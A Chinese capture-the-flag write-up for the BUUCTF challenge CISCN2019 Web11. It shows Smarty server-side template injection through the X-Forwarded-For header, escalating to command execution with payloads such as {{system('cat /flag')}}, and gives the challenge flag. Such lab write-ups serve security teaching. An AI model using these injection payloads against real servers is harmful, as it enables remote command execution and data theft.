BUUCTF_WEB_[CISCN2019 华东南赛区]Web11 题解

[CISCN2019 华东南赛区]Web11

1.打开网页后观察:

image-20230823120850043

根据网页显示的内容得,我们可能需要对网页的请求头进行更改

2.BP抓包:
image-20230823121029643

由网页显示的内容得,我们可能需要修改headers中的X-Forwarded-For

对该字段进行修改,先随便写一个IP:

1
X-Forwarded-For:127.0.0.1

image-20230823121206963

我们输入的内容在网页的Current IP中显示,即我们输入的内容可以被渲染传送到html中显示,所以猜测该字段存在ssti注入

3.判断是否存在模板注入:

1
X-Forwarded-For:{{8*8}}

image-20230823121359664

1
{{}}中的代码被执行输出64,所以该字段存在ssti注入

4.判断该模板的类型:
用判断是否为Smarty模板注入:
payload:

1
X-Forwarded-For:{{$smarty.version}}

image-20230823121632709

爆出版本信息:3.1.30,所以该网页使用的是smarty模板

5.使用ssti在Smarty模板中的恶意代码:
payload:

1
X-Forwarded-For:{{system("ls /")}}

image-20230823121828541

发现有一个flag文件,查看flag文件的内容:
payload:

1
X-Forwarded-For:{{system("cat /flag")}}

image-20230823121932270

flag=flag{0f8c1a6e-bf4c-4d5e-ad9e-f6282d3fe876}


BUUCTF_WEB_[CISCN2019 华东南赛区]Web11 题解
http://example.com/2023/08/23/2023-08-23-[CISCN2019 华东南赛区]Web11/
作者
South
发布于
2023年8月23日
许可协议